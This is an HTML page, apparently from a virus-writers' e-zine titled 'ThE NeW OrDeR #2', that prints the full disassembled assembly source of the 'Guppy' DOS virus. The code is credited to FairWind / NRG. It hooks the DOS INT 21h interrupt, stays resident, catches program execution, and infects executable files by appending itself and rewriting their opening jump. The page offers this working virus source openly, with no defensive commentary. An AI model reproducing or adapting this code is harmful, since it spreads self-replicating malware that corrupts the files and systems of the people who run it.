<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>Guppy</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>.model tiny<br>
.radix 16<br>
.code<br>
<br>
org 100h<br>
start:<br>
call Get_Offset<br>
<br>
Get_Offset:<br>
pop si<br>
mov ax,3521h<br>
mov bx,ax<br>
int 21h<br>
<br>
mov ds:[si+Int_21_Offset-103],bx<br>
mov ds:[si+Int_21_Segment-103],es<br>
<br>
;mov dx,si<br>
db 89,0f2<br>
<br>
db 83,0c2,1f<br>
<br>
mov ah,25h<br>
int 21h<br>
<br>
inc dh<br>
push cs<br>
pop es<br>
int 27h<br>
Int_21_Handler:<br>
cmp ax,4B00h<br>
je Infect<br>
<br>
cmp al,21h<br>
jne Go_Int_21<br>
<br>
;cmp ax,bx<br>
db 39,0d8<br>
<br>
jne Go_Int_21<br>
<br>
push word ptr [si+3dh]<br>
<br>
mov bx,offset ds:[100]<br>
pop word ptr [bx]<br>
<br>
mov cl,[si+3Fh]<br>
mov [bx+2],cl<br>
<br>
Restore_Control:<br>
pop cx<br>
push bx<br>
iret<br>
<br>
Storage_Bytes db 0, 0, 0<br>
<br>
Infect:<br>
push ax<br>
push bx<br>
push dx<br>
push ds<br>
mov ax,3D02h<br>
int 21h<br>
xchg ax,bx<br>
call Get_Offset_Two<br>
<br>
Get_Offset_Two:<br>
pop si<br>
push cs<br>
pop ds<br>
mov ah,3F<br>
mov cx,3<br>
sub si,10<br>
<br>
db 89,0f2<br>
<br>
int 21h<br>
<br>
cmp byte ptr [si],0E9h<br>
jne Close_File<br>
mov ax,4202h<br>
xor dx,dx<br>
xor cx,cx<br>
int 21h<br>
<br>
xchg ax,di<br>
mov ah,40h<br>
mov cl,98h<br>
<br>
;mov dx,si<br>
db 89,0f2<br>
<br>
sub dx,40h<br>
int 21h<br>
<br>
mov ax,4200h<br>
xor cx,cx<br>
xor dx,dx<br>
int 21h<br>
mov cl,3<br>
<br>
;sub di,cx<br>
db 29,0cf<br>
<br>
mov [si+1],di<br>
mov ah,40h<br>
<br>
;mov dx,si<br>
db 89,0f2<br>
<br>
int 21h<br>
<br>
Close_File:<br>
mov ah,3Eh<br>
int 21h<br>
<br>
pop ds<br>
pop dx<br>
pop bx<br>
pop ax<br>
Go_Int_21:<br>
db 0EAh<br>
Int_21_Offset dw ?<br>
Int_21_Segment dw ?<br>
<br>
end start</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
